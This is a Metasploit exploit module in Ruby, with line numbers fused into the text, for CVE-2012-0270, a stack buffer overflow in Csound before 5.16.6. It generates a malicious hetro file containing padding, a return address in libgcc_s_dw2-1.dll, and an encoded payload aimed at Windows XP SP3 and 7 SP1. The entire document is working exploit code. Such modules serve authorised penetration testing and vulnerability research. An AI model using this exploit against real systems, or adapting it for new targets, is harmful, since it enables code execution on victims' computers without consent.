Path: blob/master/modules/exploits/windows/fileformat/csound_getnum_bof.rb
19669 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Csound hetro File Handling Stack Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in Csound before 5.16.6.17The overflow occurs when trying to import a malicious hetro file18from tabular format.19In order to achieve exploitation the user should import the malicious20file through csound with a command like "csound -U het_import msf.csd file.het".21This exploit doesn't work if the "het_import" command is used directly22to convert the file.23},24'License' => MSF_LICENSE,25'Author' => [26'Secunia', # Vulnerability discovery27'juan vazquez' # Metasploit module28],29'References' => [30[ 'CVE', '2012-0270' ],31[ 'OSVDB', '79491' ],32[ 'BID', '52144' ],33[ 'URL', 'http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/' ],34[ 'URL', 'http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f']35],36'Payload' => {37'Space' => 650,38'BadChars' => "\x00\x0a\x1a\x2c\xff",39'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -350040'DisableNops' => true41},42'Platform' => 'win',43'Targets' => [44[45'Csound 5.15 / Windows XP SP3 / Windows 7 SP1',46{47'Offset' => 132,48'Ret' => 0x6e955446 # push esp # ret / libgcc_s_dw2-1.dll49}50],51],52'Privileged' => false,53'DefaultTarget' => 0,54'DisclosureDate' => '2012-02-23',55'Notes' => {56'Reliability' => UNKNOWN_RELIABILITY,57'Stability' => UNKNOWN_STABILITY,58'SideEffects' => UNKNOWN_SIDE_EFFECTS59}60)61)6263register_options(64[65OptString.new('FILENAME', [ false, 'The file name.', 'msf.csd']),66]67)68end6970def exploit71sploit = rand_text(target['Offset'])72sploit << [target.ret].pack("V")73sploit << payload.encoded74print_status("Creating '#{datastore['FILENAME']}' file ...")75file_create(sploit)76end77end787980